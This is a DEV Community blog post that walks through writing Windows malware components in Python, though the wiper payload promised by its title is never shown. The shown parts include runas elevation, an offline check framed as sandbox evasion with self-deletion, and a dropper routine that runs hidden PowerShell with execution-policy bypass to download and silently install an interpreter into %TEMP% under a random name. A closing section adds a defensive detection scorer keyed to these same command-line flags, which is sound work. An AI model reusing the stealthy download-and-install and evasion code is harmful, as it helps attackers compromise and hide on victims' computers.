DEV Community

maximilian feldthusen

Simple Whiper

Introduction

In this article, I'll describe how to write a piece of malware. Please note that this is not "true" malware; it is only meant to show you the basics and how easily such a thing can be written. Python is probably not the best choice for the job: it is an interpreted language, so it needs an interpreter to run, and languages that compile to native code and can work closer to the hardware are usually a better fit. Malware is often designed to be small, stealthy, have a low memory footprint and use little processing power.
So it is very common to see malware written in C and assembly.

Overview

First I will show the code, then I will describe generally how this malware works. The code consists of two components, and we are talking only about Windows. The techniques you will see in this malware are taken from public malware samples.
The first function is IsAdmin:

import ctypes

def IsAdmin():
    # Ask the shell whether the current process token is elevated (member of
    # Administrators with the token actually elevated). Returns a BOOL (int).
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except Exception:
        return False

It checks whether the process has Administrator privileges. If it doesn't, RunAsAdmin relaunches the script through ShellExecute with the "runas" verb, which asks Windows for elevation, and then exits immediately. Note that "runas" is not a UAC bypass: on a system with UAC enabled the user sees the normal consent prompt and has to accept it.


import sys

def RunAsAdmin():
    # Already elevated: nothing to do.
    if ctypes.windll.shell32.IsUserAnAdmin():
        return
    # Relaunch ourselves elevated. sys.argv is joined without quoting, so
    # arguments containing spaces would be split by the new process.
    # ShellExecuteW returns a value > 32 on success.
    ok = ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32
    # The original process exits either way; the elevated copy carries on.
    sys.exit(0 if ok else 1)

Is64Bit

import platform

def Is64Bit():
    # platform.machine() reports the OS/processor architecture ('AMD64', 'ARM64',
    # 'x86'), not the bitness of the running Python process: a 32-bit Python on
    # 64-bit Windows still returns True here, which is what we want for picking
    # an installer.
    return platform.machine().endswith('64')

It checks whether the machine is 64-bit using the platform library. Note that this is the architecture of Windows itself, not of the current process; a 32-bit Python running on 64-bit Windows still reports AMD64, and that is the right answer when choosing which installer to download. The function is called later in InstallPy to decide which version of Python to install, through a simple if statement:

os_p = 64
if not Is64Bit():
    os_p = 32

IsOnline: this function simply checks whether the infected computer is online by using the `requests` library to fetch an HTTP response. If that succeeds, the program continues; if not, the program deletes itself. Why? It is a crude way to avoid analysis (sandboxes are often kept offline), and we don't want to infect a machine that cannot reach the network anyway 😉

import requests

def IsOnline():
    # verify=False skips TLS certificate validation so the check also works behind
    # an intercepting proxy (urllib3 will print an InsecureRequestWarning).
    try:
        requests.get('https://google.com', verify=False, timeout=10)
        return True
    except requests.RequestException:
        return False

Interpreter

IsPyExist: here I use os.path.exists to see whether a Python installation exists on the infected computer. The same can be done by using subprocess to run a PowerShell command that prints the Python version; either way we learn whether Python is present on the infected computer or not.

import os
import subprocess

def IsPyExist():
    # Option 1: run "python -V" through PowerShell. If python is not on PATH the result
    # is an ErrorRecord; the Windows Store stub prints "Python was not found...", so
    # only a real "Python 3.x" banner counts.
    startupinfo = subprocess.STARTUPINFO()
    startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW   # wShowWindow defaults to SW_HIDE
    p = subprocess.run(['powershell',
                        """$p = &{python -V} 2>&1;$version = if($p -is [System.Management.Automation.ErrorRecord]){$p.Exception.Message}; $p"""],
                       stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=startupinfo)
    if p.stdout.decode(errors="replace").strip().startswith("Python 3"):
        return True
    # Option 2: per-user install in the default location (Python38, Python39, ...; note
    # that 3.10+ uses Python310 etc., which this range does not cover).
    for num in range(10, 45):
        if os.path.exists(f"C:/Users/{os.getlogin()}/Appdata/Local/Programs/Python/Python{num}/python.exe"):
            return True
    return False

InstallPy: the goal of this function is to install Python on the infected machine. The key point is that the interpreter is fetched with tooling that is already built into Windows (PowerShell), so this stage depends on nothing a stock system lacks. One caveat: PrependPath=1 edits the user's PATH in the registry, and a process that is already running does not pick that change up, so the pip commands at the end only find the new interpreter if python was already reachable or the function is run again from a fresh process.


import os
import random
import subprocess

def InstallPy():
    os_p = 64
    if not Is64Bit():
        os_p = 32
    # Random file name so the dropped installer has no fixed name to hunt for.
    rand_py = f'python{random.randrange(111, 9999999)}.exe'
    url = ("https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe" if os_p == 64
           else "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe")
    temp = f"c:/users/{os.getlogin()}/appdata/local/temp"
    # Download with a tool that ships with Windows: PowerShell's Invoke-WebRequest (iwr).
    subprocess.run(
        f"""powershell -ep Bypass -WindowStyle Hidden -Command "iwr -Uri {url} -OutFile {temp}/{rand_py}" """)
    if os.path.exists(f"{temp}/{rand_py}"):
        # Silent per-user install. PrependPath=1 changes the user's PATH in the
        # registry, which this already-running process will not see.
        subprocess.run(
            f"{temp}/{rand_py} /quiet InstallAllUsers=0 Include_launcher=0 PrependPath=1 Include_test=0")
        os.remove(f"{temp}/{rand_py}")
    subprocess.run("python -m pip install --upgrade pip")
    subprocess.run("python -m pip install pyinstaller psutil")
    pip_list = subprocess.run("python -m pip list", capture_output=True, text=True).stdout
    if 'psutil' in pip_list.lower():
        os.system('msg %username% in!')
    subprocess.run("msg %username% finished")
    return True
PowerShell -WindowStyle Hidden

hides the console window so nothing flashes on the victim's screen.

-ExecutionPolicy Bypass (abbreviated -ep Bypass in the code)

does not elevate anything; the Administrator part is handled by the runas step earlier. It only tells PowerShell to ignore the script execution policy, which is a per-user safety setting rather than a security boundary, so the command runs however the policy is configured.

iwr -Uri (Invoke-WebRequest)

iwr is the alias for Invoke-WebRequest. Without -OutFile it parses the response and returns the links, forms and images it finds; with -OutFile, as here, it simply writes the response body to disk. The {url} is downloaded with no user interaction, and -OutFile saves the Python installer to the temp directory under the random name {rand_py}.
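Seen from the defender's side, the combination of flags above is exactly what a process-creation rule keys on. The following is an added example and not code from the original post: a small scorer run over constructed Sysmon-style process events. The sample records, the indicator weights and the alert threshold of 4 are my own choices for illustration, not taken from any product or from the article.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (fields modelled on Sysmon Event ID 1
# / Security 4688). These are made up for the example, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the dropper launches the hidden PowerShell downloader from InstallPy
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
        "cmdline": 'powershell -ep Bypass -WindowStyle Hidden -Command "iwr -Uri '
                   'https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe '
                   '-OutFile c:/users/$env:username/appdata/local/temp/python48213.exe"',
    },
    {   # the downloaded installer is then run silently from %TEMP%
        "image": r"C:\Users\alice\AppData\Local\Temp\python48213.exe",
        "parent": r"C:\Users\alice\AppData\Local\Temp\dropper.exe",
        "cmdline": r"c:/users/alice/appdata/local/temp/python48213.exe /quiet "
                   r"InstallAllUsers=0 Include_launcher=0 PrependPath=1 Include_test=0",
    },
    {   # benign: an administrator running a maintenance script
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # benign: an interactive download into the user's Documents folder
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"powershell Invoke-WebRequest -Uri https://example.org/report.csv "
                   r"-OutFile C:\Users\alice\Documents\report.csv",
    },
]

# (name, weight, regex applied to the lower-cased command line). powershell.exe
# accepts any unambiguous parameter prefix, so "-ep", "-exec" and "-w" are
# matched as well as the full parameter names.
INDICATORS = [
    ("hidden_window",         2, re.compile(r"-w(?:i\w*)?\s+hidden\b")),
    ("execpolicy_bypass",     1, re.compile(r"-e(?:x\w*|p)?\s+bypass\b")),
    ("web_download_to_file",  2, re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget)\b.*-outf\w*\s")),
    ("temp_path_in_cmdline",  2, re.compile(r"[\\/]temp[\\/]|\$env:temp\b|%temp%")),
    ("silent_python_install", 2, re.compile(r"/quiet\b.*\binstallallusers=0\b.*\bprependpath=1\b")),
]
TEMP_DIR = re.compile(r"[\\/]appdata[\\/]local[\\/]temp[\\/]", re.IGNORECASE)
ALERT_THRESHOLD = 4   # chosen for this example; tune against your own baseline


def score_event(event: Dict[str, str]) -> Dict[str, object]:
    """Return the indicators matched by one event, its total weight and whether it alerts."""
    cmd = event["cmdline"].lower()
    hits = [name for name, _w, rx in INDICATORS if rx.search(cmd)]
    score = sum(w for name, w, _rx in INDICATORS if name in hits)
    if TEMP_DIR.search(event["image"]):          # executable launched out of %TEMP%
        hits.append("image_in_temp")
        score += 2
    return {"hits": hits, "score": score, "alert": score >= ALERT_THRESHOLD}


def download_exec_chains(events: List[Dict[str, str]]) -> Dict[str, set]:
    """Correlate alerting events by parent: a parent that both downloads into %TEMP%
    and then executes something from %TEMP% matches the dropper pattern above."""
    by_parent: Dict[str, set] = {}
    for e in events:
        result = score_event(e)
        if result["alert"]:
            by_parent.setdefault(e["parent"], set()).update(result["hits"])
    return {p: h for p, h in by_parent.items()
            if "web_download_to_file" in h and "image_in_temp" in h}


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        r = score_event(e)
        print(f'{"ALERT" if r["alert"] else "ok   "} score={r["score"]} {r["hits"]}')
    print("download-then-execute chains:", list(download_exec_chains(SAMPLE_EVENTS)))
```

The prefix-tolerant patterns matter because powershell.exe accepts -w for -WindowStyle and -ep for -ExecutionPolicy, so a rule that only matches the full parameter names misses the exact command used in InstallPy. Command-line matching alone is still weak against -EncodedCommand; pair it with PowerShell script block logging (Event ID 4104), where the decoded iwr call appears in clear text.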
